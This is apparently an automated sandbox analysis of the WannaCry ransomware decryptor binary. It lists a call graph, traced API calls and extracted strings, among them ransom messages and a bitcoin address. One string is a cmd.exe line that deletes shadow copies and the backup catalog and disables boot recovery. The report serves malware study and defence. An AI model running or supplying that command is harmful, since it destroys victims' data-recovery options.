403e3a FindClose 5978->5979 5979->5974 5980->5978 5981 403d38 fopen 5980->5981 5981->5978 5982 403d5c fread 5981->5982 5983 403e15 fclose 5982->5983 5984 403d7b 5982->5984 5983->5978 5984->5983 5985 403d8f sprintf 5984->5985 5986 403dd4 SendMessageA #823 SendMessageA 5984->5986 5988 401c30 inet_ntoa 5984->5988 5985->5986 5986->5983 5988->5984 6333 4086e0 #470 GetClientRect SendMessageA #6734 #323 6334 408765 6333->6334 6335 408838 6334->6335 6336 4087bd CreateCompatibleDC #1640 6334->6336 6337 408885 #2754 6335->6337 6340 408869 FillRect 6335->6340 6365 409e70 CreateCompatibleBitmap #1641 6336->6365 6339 408897 #2381 6337->6339 6342 4088b4 6339->6342 6346 408a7d 6339->6346 6340->6339 6341 408809 6366 409f10 6341->6366 6345 4088be #3797 6342->6345 6342->6346 6348 408901 _ftol 6345->6348 6349 409f80 BitBlt 6346->6349 6351 408a5e 6346->6351 6347 408817 #6194 6347->6335 6354 40895e _ftol 6348->6354 6359 40897e 6348->6359 6352 408abe 6349->6352 6372 409e20 #2414 6351->6372 6355 408ad5 #5785 6352->6355 6356 408ac6 #5785 6352->6356 6354->6359 6355->6351 6356->6351 6357 408afe #640 #755 6358 4089ca 6358->6351 6369 409f80 6358->6369 6359->6358 6360 4089b8 FillRect 6359->6360 6361 4089a7 FillRect 6359->6361 6360->6358 6361->6358 6363 408a50 6364 409f10 2 API calls 6363->6364 6364->6351 6365->6341 6367 409f18 #5785 6366->6367 6368 409f25 #5785 6366->6368 6367->6347 6368->6347 6370 409f8b BitBlt 6369->6370 6371 409f88 6369->6371 6370->6363 6371->6370 6372->6357 6376 407cb0 6379 4030e0 #324 #567 #567 6376->6379 6378 407cd6 6 API calls 6379->6378 6373 404fe0 #6334 6374 404ffb 6373->6374 6375 404ff4 #4853 6373->6375 6375->6374 6380 4034a0 6 API calls 5820 404cd0 5825 404cf0 #2414 #2414 #800 #641 5820->5825 5822 404cd8 5823 404cdf #825 5822->5823 5824 404ce8 5822->5824 5823->5824 5825->5822 6381 40db80 recv 6382 409f40 PtVisible 6162 404670 6167 404690 DeleteCriticalSection 6162->6167 6164 404678 6165 404688 6164->6165 6166 40467f #825 6164->6166 6166->6165 6167->6164 6168 404aa3 
6169 404ab1 6168->6169 6170 404aaa GlobalFree 6168->6170 6171 404ac0 6169->6171 6172 404ab9 CloseHandle 6169->6172 6170->6169 6172->6171 6173 4068c0 #4837 5989 408c40 5990 408d5c 5989->5990 5992 408c97 5989->5992 5991 408c9d _ftol _ftol 5991->5992 5992->5990 5992->5991 6383 403860 SendMessageA 6384 403883 #1200 6383->6384 6385 403892 SendMessageA 6383->6385 6386 4038a5 SendMessageA CreateThread 6385->6386 6387 4038d1 6385->6387 6386->6387 6388 4038e0 6386->6388 6391 4038f0 6388->6391 6390 4038e9 6410 403eb0 6 API calls 6391->6410 6393 403916 SendMessageA 6394 4039e1 6393->6394 6395 403937 SendMessageA 6393->6395 6450 403eb0 6 API calls 6394->6450 6397 403958 6395->6397 6398 403951 6395->6398 6428 401e90 6397->6428 6411 403af0 fopen 6398->6411 6399 4039ea CloseHandle 6399->6390 6402 403961 sprintf 6433 402020 6402->6433 6404 403998 6405 40399c 6404->6405 6442 403a20 6404->6442 6407 4039cd 6405->6407 6409 4039c8 #1200 6405->6409 6408 401f30 6 API calls 6407->6408 6408->6394 6409->6407 6410->6393 6412 403b28 6411->6412 6413 403b41 6411->6413 6412->6397 6414 401e90 InitializeCriticalSection 6413->6414 6415 403b4d 6414->6415 6416 402020 14 API calls 6415->6416 6417 403b67 6416->6417 6418 403b6b 6417->6418 6421 403b9b 6417->6421 6419 401f30 6 API calls 6418->6419 6423 403b82 6419->6423 6420 403c61 fclose 6424 401f30 6 API calls 6420->6424 6421->6420 6422 403bb2 fgets 6421->6422 6425 403c5f 6421->6425 6451 402650 MultiByteToWideChar 6421->6451 6422->6421 6422->6425 6423->6397 6426 403c8f 6424->6426 6425->6420 6426->6397 6543 404640 InitializeCriticalSection 6428->6543 6430 401eb6 6544 404640 InitializeCriticalSection 6430->6544 6432 401ec4 6432->6402 6545 4046f0 6433->6545 6435 402031 6436 402035 6435->6436 6437 402048 GlobalAlloc 6435->6437 6440 4046f0 12 API calls 6435->6440 6436->6404 6438 402061 6437->6438 6439 402066 GlobalAlloc 6437->6439 6438->6404 6441 402079 6439->6441 6440->6437 6441->6404 6443 403a32 GetLogicalDrives 6442->6443 6444 403adc 6442->6444 6445 
403a48 6443->6445 6444->6405 6446 403a53 GetDriveTypeW 6445->6446 6447 403ace 6445->6447 6562 4026b0 6445->6562 6446->6445 6448 403a81 GetDiskFreeSpaceExW 6446->6448 6447->6405 6448->6445 6450->6399 6454 402560 wcscpy wcsrchr 6451->6454 6453 40269a 6453->6421 6455 4025c9 wcscat 6454->6455 6456 402599 _wcsicmp 6454->6456 6458 4025bd 6455->6458 6457 4025ae _wcsicmp 6456->6457 6456->6458 6457->6455 6457->6458 6467 4020a0 CreateFileW 6458->6467 6460 4025eb 6461 4025ef DeleteFileW 6460->6461 6462 402629 DeleteFileW 6460->6462 6463 402634 6461->6463 6464 4025fa 6461->6464 6462->6463 6463->6453 6465 4025fe MoveFileW 6464->6465 6466 402617 6464->6466 6465->6453 6466->6453 6468 402143 GetFileTime ReadFile 6467->6468 6470 402139 _local_unwind2 6467->6470 6469 40217c 6468->6469 6468->6470 6469->6470 6472 402196 ReadFile 6469->6472 6470->6460 6472->6470 6473 4021b3 6472->6473 6473->6470 6474 4021c3 ReadFile 6473->6474 6474->6470 6475 4021ea ReadFile 6474->6475 6475->6470 6476 402208 ReadFile 6475->6476 6476->6470 6477 402226 6476->6477 6478 402233 CloseHandle CreateFileW 6477->6478 6479 4022f9 CreateFileW 6477->6479 6478->6470 6481 402264 SetFilePointer ReadFile 6478->6481 6479->6470 6480 40232c 6479->6480 6500 404af0 6480->6500 6481->6470 6482 402297 6481->6482 6482->6470 6484 4022a4 SetFilePointer WriteFile 6482->6484 6484->6470 6486 4022ce 6484->6486 6485 40234d 6487 402372 6485->6487 6490 404af0 4 API calls 6485->6490 6486->6470 6489 4022db SetFilePointer SetEndOfFile 6486->6489 6487->6470 6505 40a150 6487->6505 6491 402497 SetFileTime 6489->6491 6490->6487 6492 4024bc CloseHandle MoveFileW 6491->6492 6494 4024e0 _local_unwind2 6491->6494 6492->6494 6493 402477 SetFilePointerEx SetEndOfFile 6493->6491 6494->6460 6496 4023e0 ReadFile 6496->6470 6497 4023a7 6496->6497 6497->6470 6497->6493 6497->6496 6512 40b3c0 6497->6512 6501 404b04 EnterCriticalSection CryptDecrypt 6500->6501 6502 404afc 6500->6502 6503 404b2d LeaveCriticalSection 6501->6503 6504 404b3b 
LeaveCriticalSection 6501->6504 6502->6485 6503->6485 6504->6485 6506 40a15e ??0exception@@QAE@ABQBD _CxxThrowException 6505->6506 6507 40a184 6505->6507 6506->6507 6508 40a1bd 6507->6508 6510 40a197 ??0exception@@QAE@ABQBD _CxxThrowException 6507->6510 6509 40a1f6 6508->6509 6511 40a1d0 ??0exception@@QAE@ABQBD _CxxThrowException 6508->6511 6509->6497 6510->6508 6511->6509 6513 40b3ee 6512->6513 6514 40b3d0 ??0exception@@QAE@ABQBD _CxxThrowException 6512->6514 6515 40b602 ??0exception@@QAE@ABQBD _CxxThrowException 6513->6515 6516 40b410 6513->6516 6514->6513 6517 402424 WriteFile 6516->6517 6521 40b4cf ??0exception@@QAE@ABQBD _CxxThrowException 6516->6521 6524 40b4ed 6516->6524 6525 40b0c0 6516->6525 6517->6470 6517->6497 6518 40b5ba 6518->6517 6520 40b0c0 4 API calls 6518->6520 6520->6518 6521->6524 6523 40b59c ??0exception@@QAE@ABQBD _CxxThrowException 6523->6518 6524->6517 6524->6518 6524->6523 6531 40adc0 6524->6531 6526 40b0d0 ??0exception@@QAE@ABQBD _CxxThrowException 6525->6526 6527 40b0ee 6525->6527 6526->6527 6530 40b114 6527->6530 6537 40a9d0 6527->6537 6530->6516 6532 40add0 ??0exception@@QAE@ABQBD _CxxThrowException 6531->6532 6533 40adee 6531->6533 6532->6533 6534 40ae14 6533->6534 6540 40a610 6533->6540 6534->6524 6538 40a9e1 ??0exception@@QAE@ABQBD _CxxThrowException 6537->6538 6539 40a9ff 6537->6539 6538->6539 6539->6516 6541 40a621 ??0exception@@QAE@ABQBD _CxxThrowException 6540->6541 6542 40a63f 6540->6542 6541->6542 6542->6524 6543->6430 6544->6432 6546 4046b0 CryptAcquireContextA 6545->6546 6547 4046f8 6546->6547 6548 4046fc 6547->6548 6549 404709 6547->6549 6552 404770 3 API calls 6548->6552 6550 404711 CryptImportKey 6549->6550 6551 40473e 6549->6551 6554 404760 6550->6554 6555 404731 6550->6555 6553 4049b0 7 API calls 6551->6553 6556 404703 6552->6556 6557 40474c 6553->6557 6554->6435 6558 404770 3 API calls 6555->6558 6556->6435 6557->6554 6560 404770 3 API calls 6557->6560 6559 404738 6558->6559 6559->6435 6561 40475a 6560->6561 6561->6435 
6563 40c8f0 #823 6562->6563 6564 4026e4 6563->6564 6565 40c8f0 #823 6564->6565 6566 402706 swprintf FindFirstFileW 6565->6566 6567 40274d 6566->6567 6570 4027b4 6566->6570 6601 402e00 6567->6601 6569 40276a #825 6572 402e00 2 API calls 6569->6572 6571 4027d4 wcscmp 6570->6571 6574 40295d FindNextFileW 6570->6574 6575 402978 FindClose 6570->6575 6589 402856 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 6570->6589 6607 402af0 _wcsnicmp 6570->6607 6573 4027ee wcscmp 6571->6573 6571->6574 6577 4027a0 #825 6572->6577 6573->6574 6576 402808 swprintf GetFileAttributesW 6573->6576 6574->6570 6574->6575 6580 4029b9 6575->6580 6590 40298d 6575->6590 6576->6570 6578 4028b6 wcscmp 6576->6578 6579 402ace 6577->6579 6578->6574 6583 4028d0 wcscmp 6578->6583 6579->6445 6581 4029ef swprintf DeleteFileW swprintf DeleteFileW 6580->6581 6592 4026b0 84 API calls 6580->6592 6584 402a6a #825 6581->6584 6593 402a4f 6581->6593 6583->6574 6586 4028e6 wcscmp 6583->6586 6587 402aba #825 6584->6587 6595 402a94 6584->6595 6585 402560 59 API calls 6585->6590 6586->6574 6591 4028fc ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N wcslen ?assign@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV12@PBGI 6586->6591 6587->6579 6629 402da0 #823 6589->6629 6590->6580 6590->6585 6596 402da0 8 API calls 6591->6596 6592->6580 6597 402a66 6593->6597 6633 402e90 6593->6633 6595->6587 6599 402e90 2 API calls 6595->6599 6598 4028a3 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 6596->6598 6597->6584 6598->6574 6599->6595 6602 402e10 6601->6602 6603 402e7a 6601->6603 6604 402e4c #825 6602->6604 6606 402e40 #825 6602->6606 6603->6569 6604->6602 6605 402e6d 6604->6605 6605->6569 6606->6604 6608 402b1f 6607->6608 6609 402b12 wcsstr 6607->6609 6610 402b30 _wcsicmp 6608->6610 6611 402be9 _wcsicmp 6608->6611 6609->6608 6614 
402b4d _wcsicmp 6610->6614 6615 402b42 6610->6615 6612 402c07 _wcsicmp 6611->6612 6613 402bfc 6611->6613 6616 402c16 6612->6616 6617 402c21 _wcsicmp 6612->6617 6613->6570 6618 402b5c 6614->6618 6619 402b67 _wcsicmp 6614->6619 6615->6570 6616->6570 6617->6570 6618->6570 6620 402b81 _wcsicmp 6619->6620 6621 402b76 6619->6621 6622 402b90 6620->6622 6623 402b9b _wcsicmp 6620->6623 6621->6570 6622->6570 6624 402bb5 wcsstr 6623->6624 6625 402baa 6623->6625 6626 402bc4 6624->6626 6627 402bcf wcsstr 6624->6627 6625->6570 6626->6570 6627->6611 6628 402bde 6627->6628 6628->6570 6630 402dbf 6629->6630 6638 402f10 6630->6638 6632 402de4 6632->6598 6634 402eb1 6633->6634 6635 402ed0 #825 6633->6635 6636 402ec4 #825 6634->6636 6637 402ebd 6634->6637 6635->6593 6636->6635 6637->6635 6639 402f40 6638->6639 6646 403044 6638->6646 6640 402f68 6639->6640 6645 402fdb 6639->6645 6642 402f74 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6640->6642 6643 402f6e ?_Xran@std@ 6640->6643 6641 403035 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 6641->6646 6644 402f85 6642->6644 6643->6642 6647 402fc0 ?_Split@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@ 6644->6647 6649 402fa1 ?_Grow@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAE_NI_N 6644->6649 6645->6641 6648 402ff5 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N 6645->6648 6646->6632 6647->6632 6650 403006 6648->6650 6649->6647 6651 402fb7 ?_Eos@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEXI 6649->6651 6650->6632 6651->6647 6174 407db0 6181 401000 #324 #567 6174->6181 6176 407dd7 time 6177 407dfe 6176->6177 6178 407e09 #2514 6176->6178 6177->6178 6179 407e34 #765 #641 6178->6179 6180 407e28 time 6178->6180 6180->6179 6181->6176 5832 405df0 5837 405d90 #654 #765 5832->5837 5834 405df8 5835 405dff #825 5834->5835 5836 405e08 5834->5836 5835->5836 5837->5834 5993 404dd0 6 API calls 5994 404e3b SendMessageA #3092 
5993->5994 5996 404e60 SendMessageA #3092 5994->5996 5998 404e7f SendMessageA 5996->5998 5999 404e93 SendMessageA 5996->5999 6182 4035a0 SendMessageA 6183 4037e9 6182->6183 6184 4035e5 OpenClipboard 6182->6184 6184->6183 6185 4035f7 SendMessageA 6184->6185 6186 403681 GlobalAlloc 6185->6186 6187 40360f #3301 #924 #800 #800 SendMessageA 6185->6187 6188 40369b GlobalLock 6186->6188 6189 4037e3 CloseClipboard 6186->6189 6187->6186 6187->6187 6190 4036aa GlobalFree 6188->6190 6191 4036b6 SendMessageA 6188->6191 6189->6183 6190->6189 6192 4036d6 8 API calls 6191->6192 6193 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6191->6193 6195 4037bf 6192->6195 6193->6189 6195->6193 6652 409b20 6653 409b31 6652->6653 6654 409b33 #6140 6652->6654 6653->6654 6000 4130d4 ??1type_info@@UAE 6001 4130e3 #825 6000->6001 6002 4130ea 6000->6002 6001->6002 6655 40a0e0 Escape 6656 409f60 RectVisible 6657 404310 6658 40433a #470 #5789 #5875 #6172 6657->6658 6659 404333 6657->6659 6661 40438a #5789 #755 6658->6661 6660 4044c0 7 API calls 6659->6660 6660->6658 6196 409a20 6201 4099c0 6196->6201 6199 409a38 6200 409a2f #825 6200->6199 6202 409a03 6201->6202 6203 4099f3 #6170 6201->6203 6202->6199 6202->6200 6203->6202 6003 401091 6008 4010c0 #765 #641 6003->6008 6005 4010a8 6006 4010af #825 6005->6006 6007 4010b8 6005->6007 6006->6007 6008->6005 6204 4068e0 6205 4068ef 6204->6205 6206 40691a #5280 6205->6206 6207 4068fc 6205->6207 6662 402d30 6663 402d73 #825 6662->6663 6664 402d3f 6662->6664 6665 402d40 ?_Tidy@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@AAEX_N #825 6664->6665 6665->6665 6666 402d72 6665->6666 6666->6663 5838 40d880 5841 40d0a0 time srand rand 5838->5841 5840 40d88f 5842 40d0d3 rand 5841->5842 5843 40d0e1 5841->5843 5842->5842 5842->5843 5843->5840 5844 408d70 5845 408e09 GetDeviceCaps 5844->5845 5847 408eb0 5845->5847 5851 408ed8 5845->5851 5848 408eba GetDeviceCaps GetDeviceCaps 5847->5848 5847->5851 5848->5851 5849 4090b6 #2414 5850 408f51 _ftol _ftol 
5850->5851 5851->5849 5851->5850 5852 408fca _ftol _ftol _ftol 5851->5852 5854 409048 FillRect #2414 5851->5854 5855 409083 #2754 5851->5855 5852->5851 5853 409024 CreateSolidBrush #1641 5852->5853 5853->5851 5854->5851 5855->5851 6667 405230 6670 40525a 6667->6670 6680 405369 6667->6680 6668 405285 6671 40528f #4277 #923 #858 #800 #800 6668->6671 6672 4052ee 7 API calls 6668->6672 6669 405552 InvalidateRect 6674 405560 6669->6674 6670->6668 6679 405277 #940 6670->6679 6671->6669 6672->6669 6673 40539e 6675 405430 6673->6675 6676 4053aa 7 API calls 6673->6676 6677 405435 7 API calls 6675->6677 6678 4054b4 6675->6678 6676->6669 6677->6669 6682 4054b8 6678->6682 6684 405503 6678->6684 6679->6668 6679->6679 6680->6669 6680->6673 6681 405390 #940 6680->6681 6681->6673 6681->6681 6682->6669 6683 4054de #6778 #6648 6682->6683 6683->6683 6685 405501 6683->6685 6684->6669 6684->6674 6686 405529 #6778 #6648 6684->6686 6685->6669 6686->6669 6686->6686

    Executed Functions

    APIs
    • #4278.MFC42(000003E8,00000000,000003E8,?,?,76923ABC), ref: 0040830D
    • #858.MFC42 ref: 00408322
    • #800.MFC42 ref: 00408332
    • #1200.MFC42(Too short message!,00000000,00000000,?,?,76923ABC), ref: 00408354
    • #800.MFC42 ref: 0040836B
    • time.MSVCRT ref: 0040837F
    • #540.MFC42 ref: 004083C8
    • time.MSVCRT ref: 004083D6
    • #2818.MFC42(?,You are sending too many mails! Please try again %d minutes later.,0000003D,00000000), ref: 0040840A
    • #1200.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408419
    • #800.MFC42(?,00000000,00000000,?,?,?,00000000), ref: 00408429
    • #800.MFC42 ref: 00408440
    • time.MSVCRT ref: 0040844E
    • fopen.MSVCRT ref: 00408487
    • #800.MFC42 ref: 004084A8
    • fread.MSVCRT ref: 004084C2
    • fclose.MSVCRT ref: 004084C9
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BE9C
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEAD
      • Part of subcall function 0040BE90: strncpy.MSVCRT ref: 0040BEBE
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C0D5
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E20,00000000,00000000), ref: 0040C102
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,000000FF,00000000), ref: 0040C152
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E21,00000000,00000000), ref: 0040C189
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,000000FF,00000000), ref: 0040C1C2
      • Part of subcall function 0040C060: SendMessageA.USER32(?,00004E22,00000000,00000000), ref: 0040C1FE
    • #1200.MFC42(Your message has been sent successfully!,00000040,00000000), ref: 00408522
    • time.MSVCRT ref: 00408528
    • #1200.MFC42(Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!,00000030,00000000), ref: 00408544
    • #800.MFC42 ref: 0040855B
    Strings
    • You are sending too many mails! Please try again %d minutes later., xrefs: 00408404
    • 00000000.res, xrefs: 00408480
    • Too short message!, xrefs: 0040834F
    • Failed to send your message!Please make sure that your computer is connected to the Internet and your Internet Service Provider (ISP) does not block connections to the TOR Network!, xrefs: 0040853F
    • s.wnry, xrefs: 004084DD
    • Your message has been sent successfully!, xrefs: 0040851D
    Memory Dump Source
    • Source File: 0000000E.00000002.1860121782.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 0000000E.00000002.1860107091.00400000.00000002.sdmp
    • Associated: 0000000E.00000002.1860135311.00415000.00000002.sdmp
    • Associated: 0000000E.00000002.1860149005.0041F000.00000008.sdmp
    • Associated: 0000000E.00000002.1860163213.00421000.00000004.sdmp
    • Associated: 0000000E.00000002.1860185316.00423000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_14_2_400000_@WanaDecryptor@.jbxd
    APIs
    • #4710.MFC42 ref: 004064DC
    • SendMessageA.USER32(?,00000080,00000001,?), ref: 004064F9
    • SendMessageA.USER32(?,00000080,00000000,?), ref: 0040650D
      • Part of subcall function 00401C70: wcscat.MSVCRT ref: 00401CC1
      • Part of subcall function 00401C70: RegCreateKeyW.ADVAPI32(80000001,?,?), ref: 00401D00
      • Part of subcall function 00401C70: GetCurrentDirectoryA.KERNEL32(00000207,?), ref: 00401D2A
      • Part of subcall function 00401C70: RegSetValueExA.ADVAPI32(?,0041FDC4,00000000,00000001,?), ref: 00401D53
      • Part of subcall function 00401C70: RegQueryValueExA.ADVAPI32 ref: 00401D81
      • Part of subcall function 00401C70: SetCurrentDirectoryA.KERNEL32(?), ref: 00401D98
      • Part of subcall function 00401C70: RegCloseKey.ADVAPI32(00000000), ref: 00401DA3
    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 00406541
    • strrchr.MSVCRT ref: 00406554
    • strrchr.MSVCRT ref: 00406564
    • SetCurrentDirectoryA.KERNEL32(?), ref: 00406571
      • Part of subcall function 00401A10: fopen.MSVCRT ref: 00401A2B
      • Part of subcall function 00401A10: fread.MSVCRT ref: 00401A4B
      • Part of subcall function 00401A10: fwrite.MSVCRT ref: 00401A58
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A66
      • Part of subcall function 00401A10: fclose.MSVCRT ref: 00401A74
    • time.MSVCRT ref: 004065D1
      • Part of subcall function 00402C40: LoadLibraryA.KERNEL32(kernel32.dll), ref: 00402C63
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CreateFileW), ref: 00402C80
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,WriteFile), ref: 00402C8D
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,ReadFile), ref: 00402C9A
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileW), ref: 00402CA7
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,MoveFileExW), ref: 00402CB4
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,DeleteFileW), ref: 00402CC1
      • Part of subcall function 00402C40: GetProcAddress.KERNEL32(00000000,CloseHandle), ref: 00402CCE
    • WSAStartup.WS2_32(00000202,?), ref: 004065FA
    • __p___argc.MSVCRT ref: 00406600
    • __p___argv.MSVCRT ref: 0040661A
    • ExitProcess.KERNEL32 ref: 0040665B
    • __p___argv.MSVCRT ref: 00406666
    • ExitProcess.KERNEL32 ref: 004066A7
    • __p___argv.MSVCRT ref: 004066B2
    • Sleep.KERNEL32(00002710), ref: 004066F3
      • Part of subcall function 00401BB0: AllocateAndInitializeSid.ADVAPI32(?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401BEC
      • Part of subcall function 00401BB0: CheckTokenMembership.ADVAPI32(00000000,?,?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000), ref: 00401C06
      • Part of subcall function 00401BB0: FreeSid.ADVAPI32(?,?,?,?,?,?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00401C19
    • ExitProcess.KERNEL32 ref: 00406786
      • Part of subcall function 00401B50: ShellExecuteExA.SHELL32 ref: 00401B9D
    • sprintf.MSVCRT ref: 0040676A
      • Part of subcall function 00401A90: CreateProcessA.KERNEL32 ref: 00401AE3
      • Part of subcall function 00401A90: WaitForSingleObject.KERNEL32(?,?), ref: 00401AFB
      • Part of subcall function 00401A90: TerminateProcess.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000), ref: 00401B0C
      • Part of subcall function 00401A90: GetExitCodeProcess.KERNEL32(?,?), ref: 00401B20
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B31
      • Part of subcall function 00401A90: CloseHandle.KERNEL32(?), ref: 00401B38
      • Part of subcall function 004080C0: FindFirstFileA.KERNEL32(*.res,?), ref: 00408111
      • Part of subcall function 004080C0: sscanf.MSVCRT ref: 0040816A
      • Part of subcall function 004080C0: fopen.MSVCRT ref: 00408185
      • Part of subcall function 004080C0: fread.MSVCRT ref: 004081A0
      • Part of subcall function 004080C0: fclose.MSVCRT ref: 004081BE
      • Part of subcall function 004080C0: FindNextFileA.KERNEL32(?,00000010), ref: 004081F1
      • Part of subcall function 004080C0: FindClose.KERNEL32(?), ref: 00408200
      • Part of subcall function 004080C0: sprintf.MSVCRT ref: 00408266
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000), ref: 00408280
      • Part of subcall function 004080C0: #537.MFC42(?,?,00000000,?,?,00000000), ref: 004082A2
      • Part of subcall function 00407F80: fopen.MSVCRT ref: 00407FBD
      • Part of subcall function 00407F80: fread.MSVCRT ref: 00407FDD
      • Part of subcall function 00407F80: fclose.MSVCRT ref: 00407FE4
      • Part of subcall function 00407E80: SHGetFolderPathW.SHELL32(00000000,00000000,00000000,00000000,?), ref: 00407EE6
      • Part of subcall function 00407E80: wcslen.MSVCRT ref: 00407EF4
      • Part of subcall function 00407E80: swprintf.MSVCRT(?,%s\%s,?,@WanaDecryptor@.bmp), ref: 00407F20
      • Part of subcall function 00407E80: MultiByteToWideChar.KERNEL32(00000000,00000000,b.wnry,000000FF,?,00000103), ref: 00407F41
      • Part of subcall function 00407E80: CopyFileW.KERNEL32(?,?,00000000), ref: 00407F56
      • Part of subcall function 00407E80: SystemParametersInfoW.USER32(00000014,00000000,?,00000001), ref: 00407F67
    • SetWindowTextW.USER32(?,Wana Decrypt0r 2.0), ref: 0040679C
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(000000E0), ref: 00406FB3
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FBC
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00121284), ref: 00406FC6
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FCF
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(0000E000), ref: 00406FD9
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FE2
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E00000), ref: 00406FEC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00406FF5
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00000000), ref: 00406FFC
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407005
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(003834D1), ref: 0040700F
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407018
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00107C10), ref: 00407022
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 0040702B
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00E8A200), ref: 00407035
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 0040703E
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00D77800), ref: 00407048
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407051
      • Part of subcall function 00406F80: CreateSolidBrush.GDI32(00003CDA), ref: 0040705B
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 00407064
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000018,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 00407097
      • Part of subcall function 00406F80: #1641.MFC42(00000000,?,767AAD28,?), ref: 0040709C
      • Part of subcall function 00406F80: CreateFontA.GDI32(00000012,00000000,00000000,00000000,000002BC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000020,Arial), ref: 004070C9
      • Part of subcall function 00406C20: GetUserDefaultLangID.KERNEL32 ref: 00406C3B
      • Part of subcall function 00406C20: GetLocaleInfoA.KERNEL32(00000000,00001001,00000000,00000032), ref: 00406C53
      • Part of subcall function 00406C20: SendMessageA.USER32(?,00000158,00000000,00000000), ref: 00406C9A
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00406CB1
      • Part of subcall function 00406C20: SendMessageA.USER32(?,0000014D,00000000,00000000), ref: 00406CD4
    • SetTimer.USER32(?,000003E9,000003E8,00000000), ref: 004067C6
    • SetTimer.USER32(?,000003EA,00007530,00000000), ref: 004067D8
    Strings
    • Wana Decrypt0r 2.0, xrefs: 00406796
    • /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet, xrefs: 004066FE
    • %s %s, xrefs: 00406764
    • 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94, xrefs: 00406595
    • cmd.exe, xrefs: 0040671C
    APIs
    • sprintf.MSVCRT ref: 0040B87A
    • GetFileAttributesA.KERNEL32(?,?,?,?,00000000,?), ref: 0040B88D
    • sprintf.MSVCRT ref: 0040B924
    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040B934
    • CopyFileA.KERNEL32(?,?,00000000), ref: 0040B955
      • Part of subcall function 0040B780: CreateDirectoryA.KERNEL32(?,00000000,?,76E76DBE,00000428), ref: 0040B793
      • Part of subcall function 0040B780: GetTempFileNameA.KERNEL32(?,004214DC,00000000,?), ref: 0040B7D4
